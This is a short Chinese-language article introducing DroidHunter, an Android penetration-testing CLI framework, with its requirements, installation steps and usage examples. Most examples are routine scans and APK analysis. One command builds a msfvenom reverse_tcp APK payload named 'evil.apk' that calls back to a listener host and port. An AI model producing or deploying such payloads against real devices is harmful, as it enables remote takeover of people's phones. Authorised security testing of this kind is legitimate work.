导语:DroidHunter 是一款专为授权渗透测试设计的 Android 安全评估框架,一站式整合设备管理、APK 静态分析、漏洞扫描、漏洞利用、报告生成等功能,黑客风格 CLI 界面,适合专业安全研究员使用。
工具背景
DroidHunter 由 HexSec Team / HexSec Community 开发维护,定位是面向授权 Android 安全评估、教育和专业渗透测试工作流的 CLI 工具。开发者同时接受 USDT(ERC-20)捐赠支持。项目托管于 GitHub,完全开源。
核心能力
截图展示

系统要求
| 组件 | 必需 | 说明 | |——|——|——| | Python 3.8+ | ✅ | 运行环境 | | rich | ✅ | 终端 UI | | requests | ✅ | HTTP 检测 | | ADB | 可选 | 设备交互 | | scrcpy | 可选 | 远程屏幕镜像 | | Metasploit | 可选 | APK Payload 生成 | | Frida | 可选 | 运行时插桩 |
安装方法
# 克隆仓库
git clone https://github.com/hexsecteam/DroidHunter.git
cd DroidHunter
创建虚拟环境
python3 -m venv venv
source venv/bin/activate
安装依赖
pip3 install -r requirements.txt
可选:安装 ADB(Debian/Ubuntu)
sudo apt install adb
可选:安装 scrcpy(远程控制用)
sudo apt install scrcpy
运行
python3 droidhunter.py --interactive
常用命令示例:
# 列出设备
python3 droidhunter.py --devices
分析 APK + 生成 HTML 报告
python3 droidhunter.py --apk target.apk --report html --target-name "com.example.app"
端口扫描
python3 droidhunter.py --device ABC123 --port-scan
漏洞扫描
python3 droidhunter.py --device ABC123 --vuln-scan --pkg com.example.app
CVE 检查
python3 droidhunter.py --device ABC123 --cve-check
生成 msfvenom APK Payload
python3 droidhunter.py --payload reverse_tcp
--lhost 192.168.1.100 --lport 4444 --payload-out evil.apk
版权声明
下载 DroidHunter
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END












